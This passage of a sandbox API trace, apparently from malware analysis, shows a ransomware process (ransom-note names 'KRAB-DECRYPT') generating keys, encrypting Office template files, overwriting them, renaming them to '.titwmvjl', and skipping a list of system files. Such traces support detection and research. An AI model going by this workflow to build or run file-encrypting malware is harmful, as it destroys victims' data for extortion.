0x2650000 [0078.753] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.753] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.753] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.753] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.754] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.754] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.757] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.757] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.757] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.757] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.757] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.757] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.758] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.758] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.760] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.761] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503278) returned 1 [0078.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.761] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.761] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.761] GetLastError () returned 0x0 [0078.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.761] CryptDestroyKey (hKey=0x503278) returned 1 [0078.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.761] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.762] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.764] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.765] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.765] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.765] GetLastError () returned 0x0 [0078.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.765] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.765] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.765] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0078.766] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0078.766] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0xe63, lpOverlapped=0x0) returned 1 [0078.777] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffff19d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.777] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe63, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0xe63, lpOverlapped=0x0) returned 1 [0078.779] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.779] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.780] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.784] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.784] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.785] CloseHandle (hObject=0x2ec) returned 1 [0078.786] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328951[[fn=tabbed arc]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328951[[fn=tabbed arc]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.787] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.787] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.787] lstrcmpW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2=".") returned 1 [0078.787] lstrcmpW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="..") returned 1 [0078.787] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328972[[fn=Tab List]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox" [0078.787] lstrlenW (lpString=".titwmvjl") returned 9 [0078.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned 134 [0078.788] VirtualAlloc (lpAddress=0x0, dwSize=0x14c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.788] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox.titwmvjl") returned 143 [0078.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned 134 [0078.788] lstrlenW (lpString=".glox") returned 5 [0078.788] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.788] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.788] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.788] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned 134 [0078.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned 134 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="desktop.ini") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="autorun.inf") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="ntuser.dat") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="iconcache.db") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="bootsect.bak") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="boot.ini") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="ntuser.dat.log") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="thumbs.db") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="ntldr") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="NTDETECT.COM") returned 1 [0078.789] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="Bootfont.bin") returned 1 [0078.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned 134 [0078.789] lstrlenW (lpString=".glox") returned 5 [0078.789] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.789] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.789] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.790] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.790] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328972[[fn=tab list]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.790] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.790] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.805] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.806] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.806] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.809] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.810] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.810] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.810] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.810] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.810] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.811] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.811] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.814] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.815] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.815] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.815] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.815] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.815] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.815] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.816] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.816] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.820] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.820] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.820] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.821] GetLastError () returned 0x0 [0078.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.821] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.821] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.821] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.825] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.825] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.826] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.826] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.826] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.826] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.826] GetLastError () returned 0x0 [0078.826] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.827] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.827] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.827] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.827] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0078.827] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0078.827] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x1318, lpOverlapped=0x0) returned 1 [0078.844] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffece8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.844] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1318, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x1318, lpOverlapped=0x0) returned 1 [0078.846] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.846] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.847] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.852] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.853] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.853] CloseHandle (hObject=0x2ec) returned 1 [0078.854] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328972[[fn=tab list]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328972[[fn=tab list]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.855] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.855] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.855] lstrcmpW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2=".") returned 1 [0078.856] lstrcmpW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="..") returned 1 [0078.856] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328975[[fn=Theme Picture Accent]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox" [0078.856] lstrlenW (lpString=".titwmvjl") returned 9 [0078.856] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned 146 [0078.856] VirtualAlloc (lpAddress=0x0, dwSize=0x164, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.856] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox.titwmvjl") returned 155 [0078.856] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned 146 [0078.856] lstrlenW (lpString=".glox") returned 5 [0078.856] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.856] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.856] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.856] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.857] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned 146 [0078.857] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned 146 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="desktop.ini") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="autorun.inf") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="ntuser.dat") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="iconcache.db") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="bootsect.bak") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="boot.ini") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="ntuser.dat.log") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="thumbs.db") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="ntldr") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="NTDETECT.COM") returned 1 [0078.857] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="Bootfont.bin") returned 1 [0078.857] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned 146 [0078.857] lstrlenW (lpString=".glox") returned 5 [0078.857] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.858] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.858] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.858] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.858] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328975[[fn=theme picture accent]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.859] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.859] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.860] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.860] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.861] CryptAcquireContextW 